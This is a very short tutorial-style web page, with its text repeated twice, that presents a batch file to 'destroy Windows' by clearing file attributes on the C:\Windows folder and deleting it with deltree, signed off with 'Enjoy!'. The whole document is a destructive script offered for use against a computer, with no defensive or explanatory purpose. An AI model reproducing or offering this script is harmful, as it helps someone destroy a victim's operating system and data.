
HOW TO MAKE A BATCH FILE TO DESTROY WINDOWS!
This is a tutorial on how to make a batch file to destroy windows.
The code is:
@echo off
attrib -R -A -S -H -I c:\windows\
deltree c:\windows
Enjoy!

This is a tutorial on how to make a batch file to destroy windows.
The code is:
@echo off
attrib -R -A -S -H -I c:\windows\
deltree c:\windows
Enjoy!